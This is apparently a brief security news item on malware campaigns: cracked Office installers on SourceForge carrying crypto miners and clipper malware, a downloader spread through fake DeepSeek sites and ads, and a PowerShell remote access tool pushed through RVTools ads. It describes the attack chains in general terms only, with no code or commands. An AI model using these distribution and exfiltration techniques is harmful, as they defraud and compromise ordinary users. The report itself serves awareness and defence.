As per reports, a sophisticated malware campaign has been uncovered by Kaspersky, leveraging SourceForge (a popular software hosting service) to distribute cracked Microsoft Office installers laced with cryptocurrency mining and clipper malware. Impersonating as Office add-ins, the Officepackage project reportedly redirects users through deceptive links to malicious downloads hosted off-site.

• Once installed, the malware executes a chain of scripts that download miner and ClipBanker payloads, and send system data via Telegram API and establish encrypted connections using netcat.
• Attackers also distributes a malware downloader dubbed TookPS via fake websites mimicking DeepSeek AI and other legitimate software delivered through sponsored Google ads.
• Additionally, malicious ads for VMware’s RVTools have also been used to deliver a modified version of Thundershell, which is a PowerShell-based remote access tool, further uncovering threat actor’s evolving use of open-source platforms to exploit user trust and gain access to compromised systems.